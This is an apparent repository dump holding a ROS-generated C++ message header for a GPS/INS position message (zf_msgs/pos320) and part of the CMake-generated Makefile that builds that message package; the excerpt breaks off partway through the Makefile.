"content_id": "b157aa97716dab0e2ea8a849517cb65f13cc58e0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 10473,
"license_type": "no_license",
"max_line_length": 441,
"num_lines": 414,
"path": "/devel/include/zf_msgs/pos320.h",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "// Generated by gencpp from file zf_msgs/pos320.msg\n// DO NOT EDIT!\n\n\n#ifndef ZF_MSGS_MESSAGE_POS320_H\n#define ZF_MSGS_MESSAGE_POS320_H\n\n\n#include <string>\n#include <vector>\n#include <map>\n\n#include <ros/types.h>\n#include <ros/serialization.h>\n#include <ros/builtin_message_traits.h>\n#include <ros/message_operations.h>\n\n#include <std_msgs/Header.h>\n\nnamespace zf_msgs\n{\ntemplate <class ContainerAllocator>\nstruct pos320_\n{\n typedef pos320_<ContainerAllocator> Type;\n\n pos320_()\n : header()\n , length(0)\n , mode(0)\n , time1(0)\n , time2(0)\n , num(0)\n , lat(0.0)\n , lon(0.0)\n , height(0.0)\n , v_n(0.0)\n , v_e(0.0)\n , v_earth(0.0)\n , roll(0.0)\n , pitch(0.0)\n , head(0.0)\n , a_n(0.0)\n , a_e(0.0)\n , a_earth(0.0)\n , v_roll(0.0)\n , v_pitch(0.0)\n , v_head(0.0)\n , status1(0)\n , status2(0)\n , checksum(0) {\n }\n pos320_(const ContainerAllocator& _alloc)\n : header(_alloc)\n , length(0)\n , mode(0)\n , time1(0)\n , time2(0)\n , num(0)\n , lat(0.0)\n , lon(0.0)\n , height(0.0)\n , v_n(0.0)\n , v_e(0.0)\n , v_earth(0.0)\n , roll(0.0)\n , pitch(0.0)\n , head(0.0)\n , a_n(0.0)\n , a_e(0.0)\n , a_earth(0.0)\n , v_roll(0.0)\n , v_pitch(0.0)\n , v_head(0.0)\n , status1(0)\n , status2(0)\n , checksum(0) {\n (void)_alloc;\n }\n\n\n\n typedef ::std_msgs::Header_<ContainerAllocator> _header_type;\n _header_type header;\n\n typedef uint8_t _length_type;\n _length_type length;\n\n typedef uint8_t _mode_type;\n _mode_type mode;\n\n typedef int16_t _time1_type;\n _time1_type time1;\n\n typedef int32_t _time2_type;\n _time2_type time2;\n\n typedef uint8_t _num_type;\n _num_type num;\n\n typedef double _lat_type;\n _lat_type lat;\n\n typedef double _lon_type;\n _lon_type lon;\n\n typedef double _height_type;\n _height_type height;\n\n typedef double _v_n_type;\n _v_n_type v_n;\n\n typedef double _v_e_type;\n _v_e_type v_e;\n\n typedef double _v_earth_type;\n _v_earth_type v_earth;\n\n typedef double _roll_type;\n _roll_type roll;\n\n typedef double _pitch_type;\n _pitch_type pitch;\n\n typedef double _head_type;\n _head_type head;\n\n typedef double _a_n_type;\n _a_n_type a_n;\n\n typedef double _a_e_type;\n _a_e_type a_e;\n\n typedef double _a_earth_type;\n _a_earth_type a_earth;\n\n typedef double _v_roll_type;\n _v_roll_type v_roll;\n\n typedef double _v_pitch_type;\n _v_pitch_type v_pitch;\n\n typedef double _v_head_type;\n _v_head_type v_head;\n\n typedef uint8_t _status1_type;\n _status1_type status1;\n\n typedef uint8_t _status2_type;\n _status2_type status2;\n\n typedef uint8_t _checksum_type;\n _checksum_type checksum;\n\n\n\n\n\n typedef boost::shared_ptr< ::zf_msgs::pos320_<ContainerAllocator> > Ptr;\n typedef boost::shared_ptr< ::zf_msgs::pos320_<ContainerAllocator> const> ConstPtr;\n\n}; // struct pos320_\n\ntypedef ::zf_msgs::pos320_<std::allocator<void> > pos320;\n\ntypedef boost::shared_ptr< ::zf_msgs::pos320 > pos320Ptr;\ntypedef boost::shared_ptr< ::zf_msgs::pos320 const> pos320ConstPtr;\n\n// constants requiring out of line definition\n\n\n\ntemplate<typename ContainerAllocator>\nstd::ostream& operator<<(std::ostream& s, const ::zf_msgs::pos320_<ContainerAllocator> & v)\n{\nros::message_operations::Printer< ::zf_msgs::pos320_<ContainerAllocator> >::stream(s, \"\", v);\nreturn s;\n}\n\n} // namespace zf_msgs\n\nnamespace ros\n{\nnamespace message_traits\n{\n\n\n\n// BOOLTRAITS {'IsFixedSize': False, 'IsMessage': True, 'HasHeader': True}\n// {'geometry_msgs': ['/opt/ros/kinetic/share/geometry_msgs/cmake/../msg'], 'std_msgs': 
['/opt/ros/kinetic/share/std_msgs/cmake/../msg'], 'zf_msgs': ['/home/zf/xuechong_ws/zhuifengShow0919/src/zf_msgs/msg']}\n\n// !!!!!!!!!!! ['__class__', '__delattr__', '__dict__', '__doc__', '__eq__', '__format__', '__getattribute__', '__hash__', '__init__', '__module__', '__ne__', '__new__', '__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__', '__str__', '__subclasshook__', '__weakref__', '_parsed_fields', 'constants', 'fields', 'full_name', 'has_header', 'header_present', 'names', 'package', 'parsed_fields', 'short_name', 'text', 'types']\n\n\n\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zf_msgs::pos320_<ContainerAllocator> >\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsFixedSize< ::zf_msgs::pos320_<ContainerAllocator> const>\n : FalseType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zf_msgs::pos320_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct IsMessage< ::zf_msgs::pos320_<ContainerAllocator> const>\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zf_msgs::pos320_<ContainerAllocator> >\n : TrueType\n { };\n\ntemplate <class ContainerAllocator>\nstruct HasHeader< ::zf_msgs::pos320_<ContainerAllocator> const>\n : TrueType\n { };\n\n\ntemplate<class ContainerAllocator>\nstruct MD5Sum< ::zf_msgs::pos320_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"90a0b5614d459b65b16442e42c81a2f7\";\n }\n\n static const char* value(const ::zf_msgs::pos320_<ContainerAllocator>&) { return value(); }\n static const uint64_t static_value1 = 0x90a0b5614d459b65ULL;\n static const uint64_t static_value2 = 0xb16442e42c81a2f7ULL;\n};\n\ntemplate<class ContainerAllocator>\nstruct DataType< ::zf_msgs::pos320_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"zf_msgs/pos320\";\n }\n\n static const char* value(const ::zf_msgs::pos320_<ContainerAllocator>&) { return value(); }\n};\n\ntemplate<class ContainerAllocator>\nstruct Definition< ::zf_msgs::pos320_<ContainerAllocator> >\n{\n static const char* value()\n {\n return \"Header header\\n\\\nuint8 length\\n\\\nuint8 mode\\n\\\nint16 time1\\n\\\nint32 time2\\n\\\nuint8 num\\n\\\nfloat64 lat\\n\\\nfloat64 lon\\n\\\nfloat64 height\\n\\\nfloat64 v_n\\n\\\nfloat64 v_e\\n\\\nfloat64 v_earth\\n\\\nfloat64 roll\\n\\\nfloat64 pitch\\n\\\nfloat64 head\\n\\\nfloat64 a_n\\n\\\nfloat64 a_e\\n\\\nfloat64 a_earth\\n\\\nfloat64 v_roll\\n\\\nfloat64 v_pitch\\n\\\nfloat64 v_head\\n\\\nuint8 status1\\n\\\nuint8 status2\\n\\\nuint8 checksum\\n\\\n\\n\\\n================================================================================\\n\\\nMSG: std_msgs/Header\\n\\\n# Standard metadata for higher-level stamped data types.\\n\\\n# This is generally used to communicate timestamped data \\n\\\n# in a particular coordinate frame.\\n\\\n# \\n\\\n# sequence ID: consecutively increasing ID \\n\\\nuint32 seq\\n\\\n#Two-integer timestamp that is expressed as:\\n\\\n# * stamp.sec: seconds (stamp_secs) since epoch (in Python the variable is called 'secs')\\n\\\n# * stamp.nsec: nanoseconds since stamp_secs (in Python the variable is called 'nsecs')\\n\\\n# time-handling sugar is provided by the client library\\n\\\ntime stamp\\n\\\n#Frame this data is associated with\\n\\\n# 0: no frame\\n\\\n# 1: global frame\\n\\\nstring frame_id\\n\\\n\";\n }\n\n static const char* value(const ::zf_msgs::pos320_<ContainerAllocator>&) { return value(); }\n};\n\n} // namespace message_traits\n} // namespace 
ros\n\nnamespace ros\n{\nnamespace serialization\n{\n\n template<class ContainerAllocator> struct Serializer< ::zf_msgs::pos320_<ContainerAllocator> >\n {\n template<typename Stream, typename T> inline static void allInOne(Stream& stream, T m)\n {\n stream.next(m.header);\n stream.next(m.length);\n stream.next(m.mode);\n stream.next(m.time1);\n stream.next(m.time2);\n stream.next(m.num);\n stream.next(m.lat);\n stream.next(m.lon);\n stream.next(m.height);\n stream.next(m.v_n);\n stream.next(m.v_e);\n stream.next(m.v_earth);\n stream.next(m.roll);\n stream.next(m.pitch);\n stream.next(m.head);\n stream.next(m.a_n);\n stream.next(m.a_e);\n stream.next(m.a_earth);\n stream.next(m.v_roll);\n stream.next(m.v_pitch);\n stream.next(m.v_head);\n stream.next(m.status1);\n stream.next(m.status2);\n stream.next(m.checksum);\n }\n\n ROS_DECLARE_ALLINONE_SERIALIZER\n }; // struct pos320_\n\n} // namespace serialization\n} // namespace ros\n\nnamespace ros\n{\nnamespace message_operations\n{\n\ntemplate<class ContainerAllocator>\nstruct Printer< ::zf_msgs::pos320_<ContainerAllocator> >\n{\n template<typename Stream> static void stream(Stream& s, const std::string& indent, const ::zf_msgs::pos320_<ContainerAllocator>& v)\n {\n s << indent << \"header: \";\n s << std::endl;\n Printer< ::std_msgs::Header_<ContainerAllocator> >::stream(s, indent + \" \", v.header);\n s << indent << \"length: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.length);\n s << indent << \"mode: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.mode);\n s << indent << \"time1: \";\n Printer<int16_t>::stream(s, indent + \" \", v.time1);\n s << indent << \"time2: \";\n Printer<int32_t>::stream(s, indent + \" \", v.time2);\n s << indent << \"num: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.num);\n s << indent << \"lat: \";\n Printer<double>::stream(s, indent + \" \", v.lat);\n s << indent << \"lon: \";\n Printer<double>::stream(s, indent + \" \", v.lon);\n s << indent << \"height: \";\n Printer<double>::stream(s, indent + \" \", v.height);\n s << indent << \"v_n: \";\n Printer<double>::stream(s, indent + \" \", v.v_n);\n s << indent << \"v_e: \";\n Printer<double>::stream(s, indent + \" \", v.v_e);\n s << indent << \"v_earth: \";\n Printer<double>::stream(s, indent + \" \", v.v_earth);\n s << indent << \"roll: \";\n Printer<double>::stream(s, indent + \" \", v.roll);\n s << indent << \"pitch: \";\n Printer<double>::stream(s, indent + \" \", v.pitch);\n s << indent << \"head: \";\n Printer<double>::stream(s, indent + \" \", v.head);\n s << indent << \"a_n: \";\n Printer<double>::stream(s, indent + \" \", v.a_n);\n s << indent << \"a_e: \";\n Printer<double>::stream(s, indent + \" \", v.a_e);\n s << indent << \"a_earth: \";\n Printer<double>::stream(s, indent + \" \", v.a_earth);\n s << indent << \"v_roll: \";\n Printer<double>::stream(s, indent + \" \", v.v_roll);\n s << indent << \"v_pitch: \";\n Printer<double>::stream(s, indent + \" \", v.v_pitch);\n s << indent << \"v_head: \";\n Printer<double>::stream(s, indent + \" \", v.v_head);\n s << indent << \"status1: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.status1);\n s << indent << \"status2: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.status2);\n s << indent << \"checksum: \";\n Printer<uint8_t>::stream(s, indent + \" \", v.checksum);\n }\n};\n\n} // namespace message_operations\n} // namespace ros\n\n#endif // ZF_MSGS_MESSAGE_POS320_H\n"
},
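Besides the field typedefs, the pos320.h header above defines an operator<< that routes through message_operations::Printer, so a message can be dumped to any std::ostream without ROS logging. A tiny sketch of that:

    #include <iostream>
    #include <zf_msgs/pos320.h>

    int main()
    {
        zf_msgs::pos320 msg;        // generated constructor zero-initializes every field
        msg.lat = 39.864323;
        msg.lon = 116.179732;
        std::cout << msg;           // prints each field via the Printer specialization
        return 0;
    }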
{
"alpha_fraction": 0.7511162161827087,
"alphanum_fraction": 0.7637599110603333,
"avg_line_length": 42.861351013183594,
"blob_id": "ee715f1c5a432a73c82adb1db0a5d57e818c79fa",
"content_id": "181d1ce7ba136b1cbd6155df75f6dfc0c0b08e92",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 25309,
"license_type": "no_license",
"max_line_length": 224,
"num_lines": 577,
"path": "/build/zf_msgs/Makefile",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 3.5\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n\n.PHONY : default_target\n\n# Allow only one \"make -f Makefile2\" at a time, but pass parallelism.\n.NOTPARALLEL:\n\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n\n# A target that is always out of date.\ncmake_force:\n\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/zf/xuechong_ws/zhuifengShow0919/src\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/zf/xuechong_ws/zhuifengShow0919/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n\n.PHONY : list_install_components/fast\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake cache editor...\"\n\t/usr/bin/ccmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n\n.PHONY : edit_cache/fast\n\n# Special rule for the target test\ntest:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running tests...\"\n\t/usr/bin/ctest --force-new-ctest-process $(ARGS)\n.PHONY : test\n\n# Special rule for the target test\ntest/fast: test\n\n.PHONY : test/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n\n.PHONY : install/strip/fast\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake 
-H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n\n.PHONY : rebuild_cache/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n\n.PHONY : install/local/fast\n\n# The main all target\nall: cmake_check_build_system\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles /home/zf/xuechong_ws/zhuifengShow0919/build/zf_msgs/CMakeFiles/progress.marks\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_genpy.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_genpy.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_genpy.dir/rule\n\n# Convenience name for target.\nzf_msgs_genpy: zf_msgs/CMakeFiles/zf_msgs_genpy.dir/rule\n\n.PHONY : zf_msgs_genpy\n\n# fast build rule for target.\nzf_msgs_genpy/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_genpy.dir/build.make zf_msgs/CMakeFiles/zf_msgs_genpy.dir/build\n.PHONY : zf_msgs_genpy/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_gencpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_gencpp.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_gencpp.dir/rule\n\n# Convenience name for target.\nzf_msgs_gencpp: zf_msgs/CMakeFiles/zf_msgs_gencpp.dir/rule\n\n.PHONY : zf_msgs_gencpp\n\n# fast build rule for target.\nzf_msgs_gencpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_gencpp.dir/build.make zf_msgs/CMakeFiles/zf_msgs_gencpp.dir/build\n.PHONY : zf_msgs_gencpp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/geometry_msgs_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/geometry_msgs_generate_messages_eus.dir/rule\n.PHONY : zf_msgs/CMakeFiles/geometry_msgs_generate_messages_eus.dir/rule\n\n# Convenience name for target.\ngeometry_msgs_generate_messages_eus: 
zf_msgs/CMakeFiles/geometry_msgs_generate_messages_eus.dir/rule\n\n.PHONY : geometry_msgs_generate_messages_eus\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/geometry_msgs_generate_messages_eus.dir/build.make zf_msgs/CMakeFiles/geometry_msgs_generate_messages_eus.dir/build\n.PHONY : geometry_msgs_generate_messages_eus/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_generate_messages_py.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_generate_messages_py.dir/rule\n\n# Convenience name for target.\nzf_msgs_generate_messages_py: zf_msgs/CMakeFiles/zf_msgs_generate_messages_py.dir/rule\n\n.PHONY : zf_msgs_generate_messages_py\n\n# fast build rule for target.\nzf_msgs_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_generate_messages_py.dir/build.make zf_msgs/CMakeFiles/zf_msgs_generate_messages_py.dir/build\n.PHONY : zf_msgs_generate_messages_py/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/std_msgs_generate_messages_py.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/std_msgs_generate_messages_py.dir/rule\n.PHONY : zf_msgs/CMakeFiles/std_msgs_generate_messages_py.dir/rule\n\n# Convenience name for target.\nstd_msgs_generate_messages_py: zf_msgs/CMakeFiles/std_msgs_generate_messages_py.dir/rule\n\n.PHONY : std_msgs_generate_messages_py\n\n# fast build rule for target.\nstd_msgs_generate_messages_py/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/std_msgs_generate_messages_py.dir/build.make zf_msgs/CMakeFiles/std_msgs_generate_messages_py.dir/build\n.PHONY : std_msgs_generate_messages_py/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/geometry_msgs_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/geometry_msgs_generate_messages_nodejs.dir/rule\n.PHONY : zf_msgs/CMakeFiles/geometry_msgs_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\ngeometry_msgs_generate_messages_nodejs: zf_msgs/CMakeFiles/geometry_msgs_generate_messages_nodejs.dir/rule\n\n.PHONY : geometry_msgs_generate_messages_nodejs\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/geometry_msgs_generate_messages_nodejs.dir/build.make zf_msgs/CMakeFiles/geometry_msgs_generate_messages_nodejs.dir/build\n.PHONY : geometry_msgs_generate_messages_nodejs/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_generate_messages.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/zf_msgs_generate_messages.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_generate_messages.dir/rule\n\n# Convenience name for target.\nzf_msgs_generate_messages: zf_msgs/CMakeFiles/zf_msgs_generate_messages.dir/rule\n\n.PHONY : zf_msgs_generate_messages\n\n# fast build rule for target.\nzf_msgs_generate_messages/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_generate_messages.dir/build.make zf_msgs/CMakeFiles/zf_msgs_generate_messages.dir/build\n.PHONY : 
zf_msgs_generate_messages/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/std_msgs_generate_messages_nodejs.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/std_msgs_generate_messages_nodejs.dir/rule\n.PHONY : zf_msgs/CMakeFiles/std_msgs_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nstd_msgs_generate_messages_nodejs: zf_msgs/CMakeFiles/std_msgs_generate_messages_nodejs.dir/rule\n\n.PHONY : std_msgs_generate_messages_nodejs\n\n# fast build rule for target.\nstd_msgs_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/std_msgs_generate_messages_nodejs.dir/build.make zf_msgs/CMakeFiles/std_msgs_generate_messages_nodejs.dir/build\n.PHONY : std_msgs_generate_messages_nodejs/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/std_msgs_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/std_msgs_generate_messages_cpp.dir/rule\n.PHONY : zf_msgs/CMakeFiles/std_msgs_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nstd_msgs_generate_messages_cpp: zf_msgs/CMakeFiles/std_msgs_generate_messages_cpp.dir/rule\n\n.PHONY : std_msgs_generate_messages_cpp\n\n# fast build rule for target.\nstd_msgs_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/std_msgs_generate_messages_cpp.dir/build.make zf_msgs/CMakeFiles/std_msgs_generate_messages_cpp.dir/build\n.PHONY : std_msgs_generate_messages_cpp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pose2dArray.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pose2dArray.dir/rule\n.PHONY : zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pose2dArray.dir/rule\n\n# Convenience name for target.\n_zf_msgs_generate_messages_check_deps_pose2dArray: zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pose2dArray.dir/rule\n\n.PHONY : _zf_msgs_generate_messages_check_deps_pose2dArray\n\n# fast build rule for target.\n_zf_msgs_generate_messages_check_deps_pose2dArray/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pose2dArray.dir/build.make zf_msgs/CMakeFiles/_zf_msgs_generate_messages_check_deps_pose2dArray.dir/build\n.PHONY : _zf_msgs_generate_messages_check_deps_pose2dArray/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/std_msgs_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/std_msgs_generate_messages_eus.dir/rule\n.PHONY : zf_msgs/CMakeFiles/std_msgs_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nstd_msgs_generate_messages_eus: zf_msgs/CMakeFiles/std_msgs_generate_messages_eus.dir/rule\n\n.PHONY : std_msgs_generate_messages_eus\n\n# fast build rule for target.\nstd_msgs_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/std_msgs_generate_messages_eus.dir/build.make zf_msgs/CMakeFiles/std_msgs_generate_messages_eus.dir/build\n.PHONY : std_msgs_generate_messages_eus/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/zf_msgs_genlisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 
zf_msgs/CMakeFiles/zf_msgs_genlisp.dir/rule\n.PHONY : zf_msgs/CMakeFiles/zf_msgs_genlisp.dir/rule\n\n# Convenience name for target.\nzf_msgs_genlisp: zf_msgs/CMakeFiles/zf_msgs_genlisp.dir/rule\n\n.PHONY : zf_msgs_genlisp\n\n# fast build rule for target.\nzf_msgs_genlisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/zf_msgs_genlisp.dir/build.make zf_msgs/CMakeFiles/zf_msgs_genlisp.dir/build\n.PHONY : zf_msgs_genlisp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/rule\n.PHONY : zf_msgs/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\ngeometry_msgs_generate_messages_lisp: zf_msgs/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/rule\n\n.PHONY : geometry_msgs_generate_messages_lisp\n\n# fast build rule for target.\ngeometry_msgs_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f zf_msgs/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/build.make zf_msgs/CMakeFiles/geometry_msgs_generate_messages_lisp.dir/build\n.PHONY : geometry_msgs_generate_messages_lisp/fast\n\n# Convenience name for target.\nzf_msgs/CMakeFiles/std_msgs_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 zf_msgs/CMakeFiles/std_msgs_generate_messages_lisp.dir/rule\n.PHONY : 